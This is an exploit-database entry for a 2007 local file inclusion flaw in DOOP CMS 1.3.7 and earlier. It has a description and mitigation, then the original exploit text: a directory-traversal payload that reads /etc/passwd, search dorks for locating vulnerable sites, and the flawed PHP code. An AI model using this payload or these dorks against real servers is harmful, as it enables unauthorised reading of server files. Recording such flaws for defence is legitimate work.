DOOP CMS - exploit.company

vendor:

DOOP CMS

by:

@vladii

5.5

CVSS

MEDIUM

Local File Inclusion

CWE

Product Name: DOOP CMS

Affected Version From: <=1.3.7

Affected Version To: <=1.3.7

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

DOOP CMS <=1.3.7 Local File Inclusion

The vulnerability allows an attacker to include local files on the server by manipulating the 'page' parameter in the URL. It can be exploited if the 'magic_quotes_gpc' setting is set to OFF.

Mitigation:

Enable 'magic_quotes_gpc' setting or upgrade to a newer version of DOOP CMS that fixes the vulnerability.

Source

Exploit-DB raw data:

 ______________________________________________________
|         DOOP CMS <=1.3.7 Local File Inclusion        |
|______________________________________________________|

 ______________________________________________________
| vuln path: ?page=/../../../../../../../etc/passwd%00 |
|                                                      |
| dork: Doop CMS                                       |
| dork2: powered by Doop CMS                           |
|                                                      |       
| work only if magic_quotes_gpc are set to OFF         |
|______________________________________________________|

 ______________________________________________________
| vuln code:                                           |
| line 544:                                            |
|  if (!isset($_REQUEST['page'])){                     |
|    $_REQUEST['page']=$homepage;                      |
|    $cpage=$_REQUEST['page'];                         |
|  } else { $cpage=$_REQUEST['page']; }                |
|                                                      |
| line 646:                                            |
|  if ($admin == FALSE && !isset($_SESSION['name']) || isset($_REQUEST['preview'])){
|    if (file_exists("pages/".$cpage.".htm")){         |
|        include("pages/".$cpage.".htm");              |
|    }                                                 |
|    else include("pages/".$cpage.".html");            |
|   }                                                  |
|______________________________________________________|
 ______________________________________________________
| greetz to: http://vladii.wordpress.com               |
|            http://rstzone.org                        |
|            http://hackpedia.info                     |
|            SlicK & Shocker & moubik & kw3            |
|______________________________________________________|

 ______________________________________________________
|                  @vladii 2007                        |
|______________________________________________________| 

# milw0rm.com [2007-10-15]